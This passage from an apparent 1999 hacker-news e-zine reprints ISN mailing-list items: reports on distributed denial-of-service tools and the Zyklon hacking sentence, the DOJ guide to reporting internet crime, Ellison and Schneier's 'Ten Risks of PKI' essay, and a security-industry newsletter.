become a kind of currency, with attackers trading names and information
about them over Internet Relay Chat (IRC) discussions, Threatte said.
Threatte defended Packet Storm's philosophy of publishing attack software
for all to see. "If we don't make it available, there's no way you can
protect against these things," Threatte said. Sprint, for example,
recently called upon Packet Storm's information to more quickly fend off
an intruder.
Other, more dangerous versions of distributed attack software are
circulating, but Packet Storm doesn't have them, so they're harder to
detect, Threatte said.
Packet Storm, a five-person group based in Palo Alto, Calif., is no
stranger to controversy. It's now owned by security consultants
Kroll-O'Gara after being embroiled in a debate with its former home at
Harvard University and hacker chronicle site AntiOnline.
Threatte foresees a time when coordinated denial-of-service is more
serious. "Distributed attack tools right now are kind of in their
infancy," she said.
New improvements could involve a self-replicating "worm" version that
would automatically spread the attack software to new computers. After
several generations of spreading, the worm could erase itself from the
original computers used to launch the worm, severing ties with the true
origin. The worms could monitor several sites on the Internet for a sign
that triggers the time and target to attack.
ISN is sponsored by Security-Focus.COM
@HWA
32.0 [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "James J. Capone" <james@ptm.com>
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2413687,00.html
Groups ask others to take hiatus in response to government plea.
December 23, 1999
In a seemingly contradictory move, two hacking groups have defaced
websites to urge others to refrain from hacking over the New Year's
weekend. "... it is our hope that others will also abstain from defacing,
until the Y2K hysteria has settled down." -- message posted on defaced
website On Tuesday, a group using the handle Verb0 inserted this message
into several sites: "Stop hacking for one day, from 31th December 1999 to
1st January 2000." Online games site Echelon Entertainment was among those
hit, ZDNN reports
ISN is sponsored by Security-Focus.COM
@HWA
33.0 [ISN] How to report internet related crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Elias Levy <aleph1@SECURITYFOCUS.COM>
http://www.usdoj.gov/criminal/cybercrime/reporting.htm
Computer Crime and
Intellectual Property Section (CCIPS)
How to Report Internet-Related Crime
Internet-related crime, like any other crime, should be reported to
appropriate law enforcement investigative authorities at the local,
state, federal, or international levels, depending on the scope of
the crime. Citizens who are aware of federal crimes should report
them to local offices of federal law enforcement.
Some federal law enforcement agencies that investigate domestic
crime on the Internet include: the [1]Federal Bureau of
Investigation (FBI), the [2]United States Secret Service, the
[3]United States Customs Service, and the [4]Bureau of Alcohol,
Tobacco and Firearms (ATF). Each of these agencies has offices
conveniently located in every state to which crimes may be
reported. Contact information regarding these local office may be
found in local telephone directories. In general, federal crime
may be reported to the local office of an appropriate law
enforcement agency by a telephone call and by requesting the "Duty
Complaint Agent."
Each law enforcement agency also has a headquarters (HQ) in
Washington, D.C., which has agents who specialize in particular
areas. For example, the FBI and the U.S. Secret Service both have
headquarters-based specialists in computer intrusion (i.e.,
computer hacker) cases. In fact, the FBI HQ hosts an interagency
center, the [5]National Infrastructure Protection Center (NIPC),
created just to support investigations of computer intrusions. The
NIPCs general number for criminal investigations is 202-324-0303.
The U.S. Secret Services Electronic Crimes Branch may be reached at
202-435-5850. The FBI and the Customs Service also have
specialists in intellectual property crimes (i.e., copyright,
software, movie, or recording piracy, trademark counterfeiting).
Customs has a nationwide toll-free hotline for reporting at
800-BE-ALERT, or 800-232-2538.
The FBI investigates violations of federal criminal law generally.
Certain law enforcement agencies focus on particular kinds of
crime. Other federal agencies with investigative authority are the
[6]Federal Trade Commission and the [7]U.S. Securities and Exchange
Commission.
To determine some of the federal investigative law enforcement
agencies that may be appropriate for reporting certain kinds of
crime, please refer to the following table:
Type of Crime
Appropriate federal investigative law enforcement agencies
Computer intrusion (i.e. hacking) FBI local office; NIPC
(202-324-0303); U.S. Secret Service local office
Password trafficking FBI local office; NIPC (202-324-0303); U.S.
Secret Service local office
Copyright (software, movie, sound recording) piracy FBI local office;
if imported, U.S. Customs Service local office (800-BE-ALERT, or
800-232-2538)
Theft of trade secrets FBI local office
Trademark counterfeiting FBI local office; if imported, U.S. Customs
Service local office (800-BE-ALERT, or 800-232-2538)
Counterfeiting of currency U.S. Secret Service local office; FBI
local office
Child Pornography or Exploitation FBI local office; if imported, U.S.
Customs Service local office (800-BE-ALERT, or 800-232-2538)
Internet fraud FBI local office; Federal Trade Commission; if
securities fraud, Securities and Exchange Commission
Internet harassment FBI local office
Internet bomb threats FBI local office; ATF local office
Trafficking in explosive or incindiary devices or firearms over the
Internet FBI local office; ATF local office
Go to . . . [8]CCIPS home page || [9]Justice Department home page
_________________________________________________________________
Updated page May 21, 1999
ISN is sponsored by Security-Focus.COM
@HWA
34.0 [ISN] Ten risks of PKI (Public Key Infrastructure)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "R. A. Hettinga" <rah@shipwright.com>
Originally To: cryptography@c2.net,
Ten Risks of PKI: What You're not Being Told about Public Key
Infrastructure By Carl Ellison and Bruce Schneier
Computer security has been victim of the "year of the..." syndrome. First
it was firewalls, then intrusion detection systems, then VPNs, and now
certification authorities (CAs) and public-key infrastructure (PKI). "If
you only buy X," the sales pitch goes, "then you will be secure." But
reality is never that simple, and that is especially true with PKI.
Certificates provide an attractive business model. They cost almost
nothing to make, and if you can convince someone to buy a certificate each
year for $5, that times the population of the Internet is a big yearly
income. If you can convince someone to purchase a private CA and pay you
afee for every certificate he issues, you're also in good shape. It's no
wonder so many companies are trying to cash in on this potential
market.With that much money at stake, it is also no wonder that almost all
the literature and lobbying on the subject is produced by PKI vendors. And
this literature leaves some pretty basic questions unanswered: What good
are certificates anyway? Are they secure? For what? In this essay, we hope
to explore some of those questions.
Security is a chain; it's only as strong as the weakest link. The security
of any CA-based system is based on many links and they're not all
cryptographic. People are involved.
Does the system aid those people, confuse them or just ignore them? Does
it rely inappropriately on the honesty or thoroughness of people?
Computer systems are involved. Are those systems secure? These all work
together in an overall process. Is the process designed to maximize
security or just profit?
Each of these questions can indicate security risks that need to be
addressed.
Before we start: "Do we even need a PKI for e-commerce?" Open any article
on PKI in the popular or technical press and you're likely to find the
statement that a PKI is desperately needed for e-commerce to flourish.
This statement is patently false. E-commerce is already flourishing, and
there is no such PKI. Web sites are happy to take your order, whether or
not you have a certificate. Still, as with many other false statements,
there is a related true statement: commercial PKI desperately needs
e-commerce in order to flourish. In other words, PKI startups need the
claim of being essential to e- commerce in order to get investors.
There are risks in believing this popular falsehood. The immediate risk is
on the part of investors. The security risks are borne by anyone who
decides to actually use the product of a commercial PKI.
Risk #1: "Who do we trust, and for what?" There's a risk from an imprecise
use of the word "trust." A CA is often defined as "trusted."
In the cryptographic literature, this only means that it handles its own
private keys well. This doesn't mean you can necessarily trust a
certificate from that CA for a particular purpose: making a micropayment
or signing a million-dollar purchase order.
Who gave the CA the authority to grant such authorizations? Who made it
trusted?
A CA can do a superb job of writing a detailed Certificate Practice
Statement, or CPS ó all the ones we've read disclaim all liability and any
meaning to the certificate ó and then do a great job following that CPS,
but that doesn't mean you can trust a certificate for your application.
Many CAs sidestep the question of having no authority to delegate
authorizations by issuing ID certificates. Anyone can assign names. We
each do that all the time. This leaves the risk in the hands of the
verifier of the certificate, if he uses an ID certificate as if it implied
some kind of authorization.
There are those who even try to induce a PKI customer to do just that.
Their logic goes: (1) you have an ID certificate, (2) that gives you the
keyholder's name, (3) that means you know who the keyholder is, (4) that's
what you needed to know. Of course, that's not what you needed to know. In
addition, the logical links from 1 to 2, 2 to 3 and 3 to 4 are
individually flawed. [We leave finding those as an exercise for the
reader.]
Risk #2: "Who is using my key?"
One of the biggest risks in any CA-based system is with your own private
signing key. How do you protect it? You almost certainly don't own a
secure computing system with physical access controls, TEMPEST shielding,
"air wall" network security, and other protections; you store your
private key on a conventional computer. There, it's subject to attack by
viruses and other malicious programs. Even if your private key is safe on
your computer, is your computer in a locked room, with video surveillance,
so that you know no one but you ever uses it? If it's protected by a
password, how hard is it to guess that password? If your key is stored on
a smart card, how attack-resistant is the card? [Most are very weak.] If
it is stored in a truly attack-resistant device, can an infected driving
computer get the trustworthy device to sign something you didn't intend to
sign?
This matters mostly because of the term "non-repudiation." Like "trusted,"
this term is taken from the literature of academic cryptography. There it
means something very specific: that the digital-signature algorithm is not
breakable, so a third party cannot forge your signature. PKI vendors have
latched onto the term and used it in a legal sense, lobbying for laws to
the effect that if someone uses your private signing key, then you are not
allowed to repudiate the signature. In other words, under some digital
signature laws (e.g., Utah and Washington), if your signing key has been
certified by an approved CA, then you are responsible for whatever that
private key does. It does not matter who was at the computer keyboard or
what virus did the signing; you are legally responsible.
Contrast this with the practice regarding credit cards. Under mail-
order/telephone-order (MOTO) rules, if you object to a line item on your
credit card bill, you have the right to repudiate it ó to say you didn't
buy that ó and the merchant is required to prove that you did.
Risk #3: "How secure is the verifying computer?"
The previous section showed that the computer holding or driving the
private key needs to be secure. Long keys don't make up for an insecure
system because total security is weaker than the weakest component in the
system.
The same applies to the verifying computer - the one that uses the
certificate.
Certificate verification does not use a secret key, only public keys.
Therefore, there are no secrets to protect. However, it does use one or
more "root" public keys. If the attacker can add his own public key to
that list, then he can issue his own certificates, which will be treated
exactly like the legitimate certificates. They can even match legitimate
certificates in every other field except that they would contain a public
key of the attacker instead of the correct one.
It doesn't help to hold these root keys in "root certificates." Such a
certificate is self-signed and offers no increased security. The only
answer is to do all certificate verification on a computer system that is
invulnerable to penetration by hostile code or to physical tampering.
Risk #4: "Which John Robinson is he?"
Certificates generally associate a public key with a name, but few people
talk about how useful that association is. Imagine that you receive the
certificate of John Robinson. You may know only one John Robinson
personally, but how many does the CA know? How do you find out if the
particular John Robinson certificate you received is your friend's
certificate? You could have received his public key in person or verified
it in person (PGP allows this), but more likely you received a certificate
in e-mail and are simply trusting that it is the correct John Robinson.
The certificate's Common Name will probably be extended with some other
information, in order to make it unique among names issued by that one CA
.
Do you know that other information about your friend? Do you know what CA
his certificate should come from?
When Diffie and Hellman introduced public-key cryptography, they proposed
a modified telephone directory in which you could find public keys.
Instead of name, address, and phone number, it would have name, address,
and public key. If you wanted to find John Robinson's public key you would
look him up in the directory, get his public key and send him a message
for his eyes only using that public key. This might have worked with the
Stanford Computer Science Department phone directory in 1976, but how many
John Robinsons are in the New York City phone book, much less in a
hypothetical phone book for the global Internet?
We grow up in small families where names work as identifiers. By the time
we're 5 years old, we know that lesson. Names work. That is false in the
bigger world, but things we learn as toddlers we never forget. In this
case, we need to think carefully about names and not blindly accept their
value by the 5-year-old's lessons locked into our memories.
Risk #5: "Is the CA an authority?"
The CA may be an authority on making certificates, but is it an authority
on what the certificate contains? For example, an SSL server certificate
contains two pieces of data of potential security interest: the name of
the keyholder (usually a corporate name) and the DNS name for the server.
There are authorities on DNS name assignments, but none of the SSL CAs
listed in the popular browsers is such an authority. That means that the
DNS name in the certificate is not an authoritative statement. There are
authorities on corporate names. These names need to be registered when one
gets a business license. However, none of the SSL CAs listed in the
browsers is such an authority. In addition, when some server holds an SSL
server certificate, it has permission to do SSL. Who granted the authority
to an SSL CA to control that permission? Is the control of that permission
even necessary? It serves an economic purpose (generating an income stream
for CAs) but does it serve a security purpose? What harm is done if an
uncertified server were allowed to use encryption? None.
Risk #6: "Is the user part of the security design?"
Does the application using certificates take the user into account or does
it concern itself only with cryptography?
For example, a normal user makes a decision of whether to shop with a
given SSL-protected Web page based on what is displayed on that page. The
certificate is not displayed and does not necessarily have a relation to
what is displayed. SSL security does not have the ability to control or
even react to the content of the Web page, only its DNS address. The
corporate name is not compared to anything the user sees and there are
some Web pages whose certificate is for a company that does Web hosting,
not for the company whose logo appears on the displayed page. Users can't,
and can't be expected to, sort this all out.
Risk #7: "Was it one CA or a CA plus a Registration Authority?"
Some CAs, in response to the fact that they are not authorities on the
certificate contents, have created a two-part certification structure: a
Registration Authority (RA), run by the authority on the contents, in
secure communication with the CA that just issues certificates. Other
vendors sell CA machinery directly to the content authority.
The RA+CA model is categorically less secure than a system with a CA at
the authority's desk. The RA+CA model allows some entity (the CA) that is
not an authority on the contents to forge a certificate with that
contents. Of course, the CA would sign a contract promising not to do so,
but that does not remove the capability. Meanwhile, since security of a
chain is weaker than the weakest link, the RA+CA is less secure than
either the RA or the CA, no matter how strong the CA or how good the
contract with the CA. Of course, the model with a CA at the authority's
desk (not at the vendor's site) violates some PKI vendors' business
models. It's harder to charge for certificates when you sell someone the
CA code (or they get it for free, as Open Source).
Risk #8: "How did the CA identify the certificate holder?"
Whether a certificate holds just an identifier or some specific
authorization, the CA needs to identify the applicant before issuing the
certificate.
There was a credit bureau that thought they would get into the CA
business.
After all, they had a vast database on people, so, the thinking ran, they
should be able to establish someone's identity online with ease. If you
want to establish identity online, you can do that provided you have a
shared secret with the subject and a secure channel over which to reveal
that secret. SSL provides the secure channel.
The trouble with a credit bureau serving this role is that in their vast
database there is not one secret shared with the subject. This is because
credit bureaus are in the business of selling their information to people
other than the subject. Worse, because credit bureaus do such a good job
at collecting and selling facts about people, others who might have
information about a subject are probably hard pressed to find any datum
shared with the subject that is not already available through some credit
bureau. This puts at risk commercial CAs that use credit bureau
information to verify identity on-line; the model just doesn't work.
Meanwhile, having identified the applicant somehow, how did the CA verify
that the applicant really controlled the private key corresponding to the
public key being certified? Some CAs don't even consider that to be part
of the application process. Others might demand that the applicant sign
some challenge right there on the spot, while the CA watches.
Risk #9: "How secure are the certificate practices?"
Certificates aren't like some magic security elixir, where you can just
add a drop to your system and it will become secure. Certificates must be
used properly if you want security. Are these practices designed with
solid security reasons, or are they just rituals or imitations of the
behavior of someone else? Many such practices and even parts of some
standards are just imitations which, when carefully traced back, started
out as arbitrary choices by people who didn't try to get a real answer.
How is key lifetime computed? Does the vendor use 1 year, just because
that's common? A key has a cryptographic lifetime. It also has a theft
lifetime, as a function of the vulnerability of the subsystem storing it,
the rate of physical and network exposure, attractiveness of the key to an
attacker, etc. From these, one can compute the probability of loss of key
as a function of time and usage. Does the vendor do that computation? What
probability threshold is used to consider a key invalid?
Does the vendor support certificate or key revocation? Certificate
Revocation Lists (CRLs) are built into some certificate standards, but
many implementations avoid them because they seem to be archaic remnants
of the newsprint booklets of bad checking account numbers one used to find
at the supermarket checkout stand. Like those booklets, CRLs are seen as
too big and too outdated to be relevant. However, if CRLs are not used,
how is revocation handled?
If revocation is handled, how is compromise of a key detected in order to
trigger that revocation? Can revocation be retroactive? That is, can a
certificate holder deny having made some signature in the past? If so,
are signatures dated so that one knows good signatures from suspect ones?
Is that dating done by a secure timestamp service?
How long are the generated public keys and why was that length chosen?
Does the vendor support 512-bit RSA keys just because they're fast or
2048-bit keys because someone over there in the corner said he thought it
was secure?
Does the proper use of these certificates require user actions? Do users
perform those actions? For example, when you establish an SSL connection
with your browser, there's a visual indication that the SSL protocol
worked and the link is encrypted. But who are you talking securely with?
Unless you take the time to read the certificate that you received, you
don't know.
Even then, you may not know (cf., Risk #4, above) but if you don't even
look, it's much like going into a private room with the lights off: you
might know that someone else is there and your conversation is private,
but until you know who that other person is, you shouldn't reveal any
secret information.
Risk #10: "Why are we using the CA process, anyway?"
One PKI vendor employee confided in us a few years ago that they had great
success selling their PKI solution, but that customers were still unhappy.
After the CA was installed and all employees had been issued certificates,
the customer turned to the PKI vendor and asked, "OK, how do we do single
sign-on?" The answer was, "You don't. That requires a massive change in
the underlying system software."
Single Sign-On (SSO) might be the killer app of PKI. Under SSO, you come
into work in the morning, plug in your smart-card, enter the PIN that
activates it, and for the rest of the day, you don't have to do any more
logins. All of that is handled for you by the SSO mechanism.
Attractive isn't it? Of course, it's attractive. Authentication is a pain.
Anything we can do to avoid it, we'll jump at.
Unfortunately, the security value of authentication is all but completely
defeated by SSO. Authentication is supposed to prove that the user is
present at the controlling computer, at the time of the test. Under SSO,
when the user has to rush to the washroom, any passing person can walk up
to that user's computer and sign on someplace via the SSO mechanism.
So, why are so many jumping at the CA process with such fervor? Do they
use certificates out of empty ritual, just because the other guy does and
it's the thing to do this year? Do they do it in order to pass the
liability buck: to be able to blame the PKI experts if any insecurity
sneaks through?
We are not that cynical. Our assessment is that security is very
difficult, both to understand and to implement. Busy system administrators
and IT managers don't have the time to really understand security. They
read the trade press. The trade press, influenced by PKI vendors, sings
the praises of PKIs. And PKI vendors know what busy people need: a
minimal-impact solution. "Here, buy this one thing and it will make you
secure." So that's what they offer. Reality falls far short of this
promise, but then, this is a business and the prominent voices are those
with something to sell. Caveat emptor.
Bruce Schneier is the author of Applied Cryptography, the Blowfish and
Twofish encryption algorithms, and dozens of research papers and articles
on cryptography and computer security. He is CTO of Counterpane Internet
Security, Inc., a managed security service company offering leading-edge
expertise in the fields of intrusion detection and prevention, preemptive
threat discovery, forensic research, and organizational IT systems
analysis.
You can subscribe to his free monthly e-mail newsletter, Crypto-Gram, at
http://www.counterpane.com
Carl M. Ellison is a Senior Security Architect for Intel Corporation, with
special focus on cryptography, cryptographic access control and public key
certificates. Prior to the focus on cryptography, his earlier professional
computer science career focused on system design with special emphasis on
distributed and networked systems.
ISN is sponsored by Security-Focus.COM
@HWA
35.0 [ISN] Forbes says he'll ditch all crypto export controls
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Declan McCullagh <declan@well.com>
http://www.wired.com/news/politics/0,1283,33049,00.html
Forbes, the Privacy Candidate
by Declan McCullagh (declan@wired.com)
11:40 a.m. 17.Dec.1999 PST
WASHINGTON -- If you're the kind of
person who frets about ever-eroding
privacy rights, Steve Forbes wants to be
your president.
In the first campaign speech by any
presidential candidate on the topic, the
publishing luminary left nothing to the
imagination: Voracious databases know
more about you than your mother does,
and the Clinton administration is
particularly to blame.
"Bit by bit, day by day, we are being
seduced by politicians promising security
as they take away our sovereignty,
promising prosperity as they gnaw away
at our privacy," Forbes told a crowd at
the conservative Free Congress
Foundation on Thursday afternoon.
Hearing someone grouse about Bill Clinton
and Al Gore at a Free Congress
Foundation event is about as remarkable
as a Macy's post-holiday sale, but Forbes'
plan to muzzle federal infocrats is one
that even the ACLU can cheer.
[...]
Much of Forbes' speech was devoted to
how the executive branch is "engaged in
the greatest assault" on privacy in the
history of the United States, a claim the
Clinton administration dismissed on Friday
as campaign hyperbole.
[...]
ISN is sponsored by Security-Focus.COM
@HWA
36.0 [ISN] Zyklon claims his crime was "no big deal"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.techserver.com/noframes/story/0,2294,500060584-500100049-500415296-0,00.html
WASHINGTON (November 22, 1999 8:10 p.m. EST http://www.nandotimes.com)
- At age 19, hacker Eric Burns has already wandered the underpinnings
of the Web where few had gone before, including an illicit visit
inside computers at the White House in May.
"I didn't really think it was too much of a big deal," said Burns -
hacker name Zyklon - who admitted responsibility for some of the most
sensational attacks on corporate and government Internet sites.
Burns pleaded guilty Friday in U.S. District Court in Alexandria, Va.,
to a single felony count of intentionally hacking into one computer,
but admitted involvement in the spate of electronic assaults.
Now Burns is facing 15 months in federal prison and $36,240 in
restitution. And under a judge's orders last week, he won't be allowed
to touch a computer for three years after his release.
Burns was initially indicted May 13 on charges of breaking into
computers for the U.S. Information Agency and two businesses. That was
four days after the White House Internet site - at www.whitehouse.gov
- was electronically assaulted.
Initially, Burns said he wasn't directly involved in that White House
attack in which the altered site included the phrase, "following peeps
get some shouts" - hacker slang for "hello" - and listed a dozen
names, including Zyklon.
Zyklon is the name of a poison gas used by Nazis against Jews.
But federal prosecutors said Burns boasted of the White House attack
online even before it happened, and Burns admitted at his sentencing
Friday he was among three people who altered the site briefly to show
a black Web page with the names of hacker organizations, along with
messages, "Your box was own3d," and, "Stop all the war."
He said Monday in a telephone interview from his home in Shorewood,
Wash., that he will refuse to identify his two partners to the Secret
Service, partly because he believes the criminal penalties for hackers
are too steep. His punishment didn't fit his crime, he insisted.
"I'd rather not have what happened to me happen to anyone else," Burns
said. "I don't really agree with the kind of sentencing range there is
for the crime."
The seriousness of the trouble facing Burns didn't sink in, he
admitted, even after FBI agents raided his home and took his computer.
"I just gave them a confession," Burns said. "I didn't think it was
too big a deal."
Prosecutors indicated otherwise.
U.S. Attorney Helen Fahey said Burns attacked computers on the
Internet controlling Web sites for NATO, a U.S. embassy and consulates
and even Vice President Al Gore. The USIA Web site was shut down for
eight days after Burns' attack.
All told, the attacks cost the government and businesses more than
$40,000, prosecutors said.
When the White House site was vandalized, experts "had to shut down
the Web server, disconnect both the public and private computer
networks from the Internet for two days and reconfigure the computer
system," Fahey said in a statement.
Burns expects to report to federal prison in four to six weeks, which
he hopes will let him spend Thanksgiving and the holidays with his
family. With time off for good behavior, his lawyer told him he might
spend as few as 13 months behind bars.
Although his sentence says he won't be allowed to use a computer
during three years of supervised probation when he's released, he's
already planning to ask his probation officer whether he'll be allowed
to use one for work.
"I really don't know" how the arrest and time in prison will affect
his future, Burns said. "Hopefully, it won't impact it too bad."
==
Some day, on the corporate balance sheet, there will be
an entry which reads, "Information"; for in most cases
the information is more valuable than the hardware which
processes it. -- Adm. Grace Murray Hopper, USN Ret.
==
http://www.dis.org/erehwon/
ISN is sponsored by Security-Focus.COM
@HWA
37.0 [ISN] Security Wire Digest Volume 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: infosecurity@emailch.com
SECURITY WIRE DIGEST, VOL. 1, NO. 8, NOV. 22, 1999
Security Wire Digest is a weekly e-mail newsletter
brought to you by Information Security magazine, an
ICSA.net publication.
TO UNSUBSCRIBE, REFER TO THE INSTRUCTIONS AT THE END OF
THIS MESSAGE.
=====================================================
CONTENTS
**THANKSGIVING NOTICE**
1. INFOSEC WEEK IN REVIEW
*Enterprise Security Management a Hot Topic at CSI
2. INDUSTRY BRIEFS
*HP VirtualVault 4.0 Goes Mainstream
*eNABLE Supports Rainbow and RSA
*Celo Debuts CeloCom VPN Suite
*RSA Joins Trusted Computing Platform Alliance
*Entegrity Partners With Identrus
*Schlumberger Introduces Easyflex Corporate
*Identix BioLogon Available Online
*Tumbleweed Acquires Worldtalk
3. HAPPENINGS
4. SECURITY PERSPECTIVES
*Exposing Hacking With Hacking Exposed
By Ben Rothke
=====================================================
THIS ISSUE OF SECURITY WIRE DIGEST IS SPONSORED BY...
Agilent Technology SFProtect NT Security Scanner
SFProtect NT Security Scanner is the ONE software
solution that empowers you to find and fix NT
vulnerabilities with one single application. How?
SFProtect scans the NT operation system, IIS and SQL
version 6.5 and 7.0 for security vulnerabilities. Once
identified, problems can be fixed with SFProtect's unique
Intellifix feature. You can also get e-mail notification
of audit results, reports in HTML, remote operation
through a secure ODBC link and more.
Download your free trial version today:
http://www.agilent.com/comms/netsecurity9
=====================================================
**THANKSGIVING NOTICE**
Security Wire Digest will take a one-issue hiatus next
week due to U.S. Thanksgiving festivities. The next
Security Wire Digest will be delivered on Monday, Dec.
6.
=====================================================
1. INFOSEC WEEK IN REVIEW
*ENTERPRISE SECURITY ADMINISTRATION A HOT TOPIC AT CSI
Easing the burdens of security administration is on the
minds of lots of security practitioners these days. As
organizations introduce new technologies and services to
network infrastructures, security admins and managers are
faced with the complex task of not only finding and
fixing new vulnerabilities before they are exploited, but
identifying and responding to breaches after they've
already occurred.
Last week at CSI's annual security conference, a number
of vendors introduced new tools and enhancements to
existing products that respond to this need by
automating, centralizing and simplifying the task of
enterprise risk management and intrusion response.
BindView Development Corp. (http://www.bindview.corp)
announced version 2.0 of its HackerShield software, an
enterprise vulnerability scanner that allows operators to
find and close security holes in servers, workstations
and network devices across a heterogeneous network.
Available in December, version 2.0 is engineered with the
increasing number of security newbies in mind; while its
database of vulnerability scripts is as extensive as that
of other enterprise-class scanners, the tool deploys fast
and is easy to configure and use. It includes a handy
Scan Wizard that walks new users through the first-time
scanning process, and when a vulnerability or breach is
identified, it uses plain language to spell out the
degree of risk and appropriate response procedures.
BMC Software (http://www.bmc.com) rolled out an
enhancement to its CONTROL-SA security suite that extends
the reach of its centralized management offering.
CONTROL-SA/Links allows admins and managers to create
event definitions and automated rulesets for disparate
parts of the enterprise network. For instance, security
managers can integrate human resource applications within
the security administration process. If a new employee
joins the organization, CONTROL-SA/Links can be directed
to intercept certain HR transactions and automatically
initiate end-user rights for the new employee.
By year-end, newcomer e-Security
(http://www.esecurityinc.com) plans to introduce a
"Management Desk" to its Open e-Security Platform (OeSP)
to help operators respond to identified security
breaches. OeSP's competitive differentiator is that it
consolidates reports of security "exceptions" in
real-time from fragmented security products -- no matter
the product brand. When the central console receives
notice of an intrusion, the Management Desk will
automatically generate a step-by-step response outline
according to the organization's predefined security
policy, contact appropriate personnel and monitor
security response procedures.
Version 5.5 of Network Associates's (http://www.nai.com)
CyberCop vulnerability scanner also automates several
administrative tasks. Its AutoFix feature automatically
repairs more than 700 identified network, protocol and
application vulnerabilities, and its AutoUpdate feature
lets admins update the scanning engine and vulnerability
database on a regular, automatic basis.
Computer Associates (http://www.cai.com) announced an
access control enhancement to its eTrust family of
security tools. With the simultaneous release of eTrust
Access Control 5.0 for UNIX and eTrust Access Control 4.1
for NT, CA provides users with a centralized system for
creating, distributing and managing access. The tools
also operate within CA's flagship enterprise management
system, Unicenter TNG.
Finally, BullSoft (http://www.bullsoft.com) announced
that it has integrated storage management capabilities
into its OpenMaster secure e-infrastructure and
enterprise management software. The added capability
allows organizations to select and configure
best-of-breed Internet and enterprise-wide storage
resources, and manage all them from a centralized
OpenMaster console.OpenMaster storage management
configuration starts at $18,900, which includes core
services such as network monitoring, alarm management and
network discovery.
=====================================================
2. INDUSTRY BRIEFS
*HP VIRTUALVAULT 4.0 GOES MAINSTREAM
Hewlett-Packard last week announced major enhancements
and new pricing to its Praesidium VirtualVault 4.0
trusted Web-server platform. The latest version of
VirtualVault provides application-level protection for
such b-to-b applications as SAP, Oracle and Ariba; and
supports a broader range of enterprise server platforms,
including Sun, Microsoft, Compaq and IBM. Optional BMC
Software Patrol SafePassage for VirtualVault simplifies
the deployment of secure extranets. Entry-level price for
VirtualVault is now $17,500.
http://www.hp.com/security
*eNABLE SUPPORTS RAINBOW AND RSA
eNABLE Solutions and Rainbow Technologies will develop
an integrated solution that combines enRole, eNABLE's
e-business access management system, with iKey, Rainbow's
USB authentication device, providing end-users with
two-factor hardware authentication in a scalable
solution. In related news, eNABLE announced that it has
enhanced enRole to provide support for RSA ACE/Server
authentication management software from RSA Security.
http://www.enablesolutions.com
http://www.rainbow.com
http://www.rsasecurity.com
*CELO DEBUTS CELOCOM VPN SUITE
Fully integrated with Celo Communications's PKI
technology, the CeloCom VPN suite offers authentication,
encryption and full X.509 and LDAP compliance. The suite
can be integrated into existing networks and can
interoperate with other VPN products, certificate
management systems, smart cards and readers, and LDAP
directory services. The suite is comprised of four
CeloCom products: CeloCom Secure remote access, CeloCom
RVPN and CeloCom LVPN remote VPN clients, and CeloCom
GateKeeper remote access server.
http://www.celocom.com
*RSA JOINS TRUSTED COMPUTING PLATFORM ALLIANCE
RSA Security Inc. joined the Trusted Computing Platform
Alliance (TCPA), an industry group whose goal is to
establish a new hardware and software specification that
technology companies can use to offer more trusted and
secure personal computers for conducting e-business. RSA
Security will work alongside founding members Compaq, HP,
IBM, Intel and Microsoft to simplify the RSA deployment,
use and manageability of SecurID technologies by
enhancing and standardizing security at the level of the
platform hardware, BIOS and operating system.
http://www.rsasecurity.com
*ENTEGRITY PARTNERS WITH IDENTRUS
Secure e-business applications provider Entegrity
Solutions has announced an agreement with the Identrus
alliance to develop enterprise-ready solutions based on
the Identrus trust model that meet Identrus
specifications for global e-commerce interoperability and
security. Using cryptography and PKI technology,
Entegrity will work with Identrus-member financial
institutions and solution providers to "trust-enable"
standard, legacy and custom applications used for b-to-b
e-commerce. Identrus members now represent 11 global
financial institutions in more than 100 countries with
more than 8 million business relationships.
http://www.entegrity.com
http://www.identrus.com
*SCHLUMBERGER INTRODUCES EASYFLEX CORPORATE
In order to meet the growing security concerns of the
corporate market, Schlumberger has introduced Easyflex
Corporate, a new dual-interface contact/contactless smart
card that facilitates secure access to the real and
virtual desktop. The card controls physical access to
offices, buildings and parking lots through its
contactless interface, as well as logical access to
computers, servers and networks through its secure
contact interface.
http://www.smartcards.com
*IDENTIX BIOLOGON AVAILABLE ONLINE
Biometric security provider Identix last week made its
BioLogon network security fingerprint identification
software and hardware available as a new product at
Beyond.com's Web site. Visitors to Beyond.com can
download the BioLogon fingerprint identification suite,
and obtain biometric hardware readers in multiple
options.
http://www.beyond.com
http://www.identix.com
*TUMBLEWEED ACQUIRES WORLDTALK
Secure messaging provider Tumbleweed Communications
Corp. last week announced a definitive agreement to
acquire Worldtalk Corp. When combined with Worldtalk's
WorldSecure e-mail content filtering products,
Tumbleweed's Integrated Messaging Exchange (IME) will
enable customers to centrally define and enforce policies
that drive new traffic across IME. Worldtalk will become
a wholly owned subsidiary of Tumbleweed. The transaction
is expected to close in the first quarter of 2000. Terms
were not released.
http://www.tumbleweed.com
http://www.worldtalk.com
=====================================================
3. HAPPENINGS
Cards on the 'Net -- Smart Cards and ID Technology:
Unlocking the Commercial Potential of the Web
Tu-Th, Nov. 30-Dec. 2, San Francisco, Calif.
http://www.ctst.com
DECEMBER
IT Solutions & Information Assurance Conference
W, Dec. 1, Los Angeles, Calif.
W & Th, Dec. 8 & 9, Colorado Springs, Colo.
http://www.technologyforums.com
18th Annual Data Center Conference: Taking the Data
Center to E-business and Beyond
W-F, Dec. 1-3, Orlando, Fla.
http://www.gartner.com
15th Annual Computer Security
Applications Conference
M-F, Dec. 6-10, Phoenix, Ariz.
http://www.acsac.org
Web and Intranet Security
T-Th, Dec. 7-9 Orlando, Fla.
http://www.misti.com
Web and Intranet Security
T-Th, Dec. 7-9 Orlando, Fla.
http://www.misti.com
SANS Security San Francisco
S-Th, Dec. 11-16, San Francisco, Calif.
